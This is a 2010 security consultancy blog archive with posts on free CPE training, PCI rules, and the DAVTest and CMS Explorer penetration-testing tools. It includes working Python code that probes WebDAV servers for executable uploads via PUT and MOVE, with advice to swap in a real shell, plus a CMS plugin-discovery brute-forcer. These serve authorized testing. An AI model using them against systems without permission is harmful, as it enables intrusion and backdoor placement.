Thursday, July 8, 2010

Free Online Cyber Security Awareness Training

As a consultant, I find it extremely difficult to meet continuing professional education (CPE) requirements by carving out time to attend instructor-led training courses. While there are many different ways to earn CPEs, I prefer self-paced, on-line training. As luck would have it, I became aware of several *free* on-line training courses offered by the Texas Engineering Extension Service (TEEX) at http://www.teex.org. They have a large selection of free courses delivered using an intuitive Adobe Flash interface.

In the area of cybercrime, a relatively new course catalog has been added that covers topics such as secure programming, information security basics, business continuity, and digital forensics, among other titles.

A few nice features of the training delivery include:

  • A pre-assessment quiz to measure your current mastery of the topic. After the quiz you receive your score and can see where to focus your training to fill any knowledge gaps.
  • Free-flowing modules that allow you to skip around to areas you want to tackle first.
  • Copious references for further study.
  • Useful material that is relevant to today's environment.
  • You receive an official PDF certificate for your records, which you can submit as proof of course completion.
  • Most importantly, it's both on-line and FREE!

In addition, there are other subjects relating to domestic security and threat awareness that are offered both on-line and as scheduled, instructor-led courses.

I hope you find it as useful as I did, and hopefully this makes it a bit easier to stay current with your CPEs.

Tuesday, May 4, 2010

More on WebDAV Testing

Since the release of DAVTest, there have been two developments which seemed worth mentioning here:
  • Ryan Linn released a Metasploit module based on the DAVTest idea. Like DAVTest, it uploads files containing simple mathematical operations to determine whether code can execute on the web server.
  • Chris Gates posted a good article titled "More with Metasploit and WebDAV," which gives a nice tutorial on how to exploit misconfigured web servers using Ryan Linn's module with Metasploit. It also points out a nice trick feature with IIS/ASP.
I'm glad the idea of using simple/standard operations is spreading to other tools, as it's a really efficient way to determine what you can and can't do remotely via WebDAV. What we need are simple tests (and back-doors) in more server-side languages.

I'm going to try and whip up a new release of DAVTest in the next week or so, incorporating a few ideas from these guys, as well as a bit of housekeeping and other updates.


If you have suggestions for the next release or tests for more languages, reply here or send me an email.

Tuesday, April 27, 2010

DAVTest: Quickly Test & Exploit WebDAV Servers

When facing off against a WebDAV enabled server during a penetration test, there are two main things to find out: can you upload files, and if so, can you upload executable files?

Testing this can be a little tricky depending on the server configuration--what extensions are you allowed to upload, can you use MOVE, and what about MKCOL?

DAVTest attempts to help answer those questions, as well as enable the pentester to quickly gain access to the host. DAVTest tries to upload test files with various extensions (e.g., ".php" or ".txt"), checks whether each upload succeeded, and then checks whether the file executes on the server. It also allows uploading the files as plain text files and then trying to use the MOVE command to rename them to an executable extension.

Once you know you can upload an executable file, a test file by itself does you no good--so DAVTest can automatically upload a fully functional shell or back-door. It ships with shells for PHP, ASP, ASPX, CFM, JSP, CGI, and PL, and dropping a file in the right directory will let you upload any back-door you like.
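The following is an added example of the upload/execute probing described above and in the "More on WebDAV Testing" post; it is not DAVTest's or the Metasploit module's own code. Each probe file computes 7*6: a verbatim echo on GET means the file was stored but not executed, a "42" means the server ran it. Extensions the server refuses to PUT directly are retried as a .txt upload followed by a MOVE. The MockDAV class is a constructed stand-in for a misconfigured server (refuses PUT of .php/.jsp, allows MOVE, "executes" .php) so the script runs offline; the probe payloads, file names and the `davtest` token are assumptions.

```python
"""DAVTest-style WebDAV probe: can we upload, and does the upload execute?
Each probe file computes 7*6; a verbatim echo means "stored", a "42" means
"executed". MockDAV is a constructed stand-in server so this runs offline."""
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Probe payloads per extension (a subset of the languages DAVTest ships).
PROBES = {"php": "<?php echo 7*6; ?>", "asp": "<% Response.Write(7*6) %>",
          "jsp": "<%= 7*6 %>", "txt": "7*6"}
EXPECTED = "42"
OK = (200, 201, 204)


def classify(status, body, payload):
    """What a GET of an uploaded probe tells us."""
    if status != 200:
        return "missing"      # PUT said OK but the file is not served back
    if payload in body:
        return "uploaded"     # served verbatim: stored, not executed
    if EXPECTED in body:
        return "executes"     # the server ran our code
    return "unknown"


def http(method, url, data=None, headers=None):
    """(status, body) for one request; 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def probe(base, token="davtest"):
    """Return {ext: (verdict, how)}; `how` is "via MOVE" when a rename was needed."""
    results = {}
    for ext, payload in PROBES.items():
        url = f"{base}/{token}.{ext}"
        if http("PUT", url, payload.encode())[0] not in OK:
            results[ext] = ("put_denied", None)
            continue
        results[ext] = (classify(*http("GET", url), payload), None)
    for ext, payload in PROBES.items():       # retry refused extensions via MOVE
        if results[ext][0] != "put_denied":
            continue
        src, dst = f"{base}/{token}_{ext}.txt", f"{base}/{token}_moved.{ext}"
        if http("PUT", src, payload.encode())[0] not in OK:
            continue
        if http("MOVE", src, headers={"Destination": dst})[0] in OK:
            results[ext] = (classify(*http("GET", dst), payload), "via MOVE")
    return results


class MockDAV(BaseHTTPRequestHandler):
    """Constructed server: PUT of .php/.jsp refused, MOVE allowed, .php 'executed'."""
    files = {}

    def log_message(self, *args):
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_PUT(self):
        data = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path.endswith((".php", ".jsp")):
            return self._reply(403)
        self.files[self.path] = data
        self._reply(201)

    def do_MOVE(self):
        if self.path not in self.files:
            return self._reply(404)
        self.files[urlparse(self.headers["Destination"]).path] = self.files.pop(self.path)
        self._reply(201)

    def do_GET(self):
        data = self.files.get(self.path)
        if data is None:
            return self._reply(404)
        if self.path.endswith(".php"):        # "execute": evaluate the a*b in the source
            m = re.search(r"(\d+)\*(\d+)", data.decode())
            data = str(int(m[1]) * int(m[2])).encode()
        self._reply(200, data)


def demo():
    """Probe the mock server; returns e.g. {"php": ("executes", "via MOVE"), ...}."""
    srv = HTTPServer(("127.0.0.1", 0), MockDAV)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return probe(f"http://127.0.0.1:{srv.server_address[1]}")
    finally:
        srv.shutdown()
```

Call `demo()` to see the verdicts, or `probe("http://host/dav")` against a real share (add authentication handlers to urllib as needed). Against the mock, .php is refused on PUT but executes after a .txt-then-MOVE, .jsp can be renamed but is only served as text, and .asp/.txt upload but do not execute. On a real engagement, DELETE the probe files afterwards and treat an "executes" verdict as the point where a test file should be replaced with a real shell.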


DAVTest is written in Perl and licensed under the GNU GPLv3.

Wednesday, March 31, 2010

CMS Explorer (or: what's that CMS running?)

As a developer, as well as a penetration tester, it's often helpful to know what components a site uses to turn it from a vanilla content management system (CMS) into a more useful site. Besides MediaWiki, I'm not aware of any CMS which publicly lists installed components--so the only way you can figure it out is manually or through small clues on the site.

CMS Explorer is an attempt to automate this component discovery. By brute-force requesting directory names for plugins and themes, we can determine which directories exist, and thus which components are installed. This relies on the server returning "normal" HTTP responses (distinct status codes for existing and missing directories)--at least for now. The end result is a list of installed items:


What makes CMS Explorer powerful for penetration testing is what happens next. If you use the -explore option with Drupal or Wordpress, the program will pull a list of potentially-existing files directly from the respective CMS code repositories, and then request those files from your target.

And just to make it a little more useful (especially in "explore" mode), you can also specify a "bootstrap" proxy. If defined, any found file will be requested a second time through this proxy--so you can prime your favorite proxy (such as Burp or Paros) for doing actual security testing of those files. This proxy applies only to found items and is separate from any main scanning proxy you may already have configured.
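As an added example of the directory brute-force and bootstrap-proxy behaviour described above (not CMS Explorer's own code), the script below requests candidate add-on directories and treats a 200 or 403 as "exists" and a 404 as "missing". Because that oracle only works on servers that answer normally, it first requests a random canary name under each add-on path and refuses to continue if the site answers for anything. The CMS layouts are assumed defaults, `FAKE_SITE` is a constructed stand-in for a target so the code runs offline, and the `fetch` parameter is an injection point so the same logic can be run against a real host with `http_status`.

```python
"""Brute-force CMS add-on discovery in the spirit of CMS Explorer (added example).
Existing directory -> 200 (index/listing) or 403 (listing denied); missing -> 404.
A canary request detects catch-all sites where every path looks present."""
import secrets
import urllib.error
import urllib.request

# Default add-on locations per CMS (assumed defaults; installs may relocate them).
LAYOUTS = {
    "wordpress": {"plugins": "wp-content/plugins/", "themes": "wp-content/themes/"},
    "drupal": {"modules": "sites/all/modules/", "themes": "sites/all/themes/"},
    "joomla": {"components": "components/", "modules": "modules/", "templates": "templates/"},
}


def http_status(url, proxy=None):
    """GET `url` and return its status; route through `proxy` (host:port) if set."""
    handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []
    try:
        with urllib.request.build_opener(*handlers).open(url, timeout=10) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code


def present(status):
    """Status-code oracle: the directory exists if it is served or forbidden."""
    return status in (200, 403)


def discover(base, cms, wordlist, fetch=http_status, bootstrap_proxy=None):
    """Return {kind: [installed names]} for `cms` at `base`.

    `fetch(url, proxy=None) -> status` is injectable so the logic can run against
    a fake site. Each hit is requested once more through `bootstrap_proxy` (if
    given) so an interception proxy has it in its history for manual testing.
    """
    base = base.rstrip("/") + "/"
    found = {}
    for kind, prefix in LAYOUTS[cms].items():
        # Canary: a name that cannot exist. If it looks present, every name will.
        canary = f"{base}{prefix}{secrets.token_hex(8)}/"
        if present(fetch(canary)):
            raise RuntimeError(f"{base}{prefix} answers for any name; status codes are not a usable oracle")
        hits = []
        for name in wordlist:
            url = f"{base}{prefix}{name}/"
            if present(fetch(url)):
                hits.append(name)
                if bootstrap_proxy:
                    fetch(url, bootstrap_proxy)   # prime the interception proxy
        found[kind] = hits
    return found


# Constructed fake WordPress target: URL -> status it would return (else 404).
FAKE_SITE = {
    "http://blog.example/wp-content/plugins/akismet/": 200,
    "http://blog.example/wp-content/plugins/jetpack/": 403,   # exists, listing denied
    "http://blog.example/wp-content/themes/twentyten/": 200,
}


def fake_fetch(url, proxy=None):
    """Offline stand-in for http_status, backed by FAKE_SITE."""
    return FAKE_SITE.get(url, 404)


def demo():
    """Run discovery against the fake site with a small constructed wordlist."""
    words = ["akismet", "jetpack", "twentyten", "all-in-one-seo"]
    return discover("http://blog.example", "wordpress", words, fetch=fake_fetch)
```

`demo()` returns the plugins and themes found on the fake site; for a real target pass the base URL, a real wordlist and leave `fetch` at its default, adding `bootstrap_proxy="127.0.0.1:8080"` to have each hit land in Burp's or Paros's history. The "explore" step (pulling file lists from the CMS repositories) and the OSVDB lookup are not shown here.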

And lastly, if you supply an OSVDB.org API key, it can search and report back a list of potential issues in the installed component.

CMS Explorer is currently set up to test Drupal, Wordpress and Joomla!/Mambo, with exploration support for Drupal and Wordpress. It is written in Perl and licensed under the GNU GPLv3.

Tuesday, January 26, 2010

New MasterCard Rules for PCI

As many of you are already aware, MasterCard announced, in early 2009, changes to Merchant PCI DSS validation requirements under its Site Data Protection (SDP) program. These changes were primarily related to 1) the ability for Merchants to utilize Internal Audit (IA) to conduct the annual onsite assessment and 2) the imposition of more stringent validation requirements for Level 2 Merchants.

In recent weeks, MasterCard has again updated its merchant validation requirements.

http://www.mastercard.com/us/sdp/merchants/merchant_levels.html


To summarize the updated MasterCard requirements:

- Level 1 Merchants may continue to utilize IA to perform the annual onsite assessment, as long as (effective June 30, 2011) the IA staff engaged in validating PCI DSS compliance attend PCI SSC-offered Merchant training programs and pass any PCI SSC associated accreditation program annually.

- Level 2 Merchants are permitted to continue to complete an annual self-assessment questionnaire (SAQ). Alternatively, Level 2 Merchants may, at their discretion, complete an annual onsite assessment conducted by a PCI SSC-approved Qualified Security Assessor (QSA) rather than complete an annual self-assessment questionnaire.

- Level 2 Merchants that choose to complete an annual self-assessment questionnaire must ensure that (effective June 30, 2011) staff engaged in the self-assessment attend PCI SSC-offered merchant training programs and pass any associated PCI SSC accreditation program annually.

We are working with our merchant clients to help them navigate the often complex and dynamic requirements associated with maintaining continued compliance with the PCI DSS.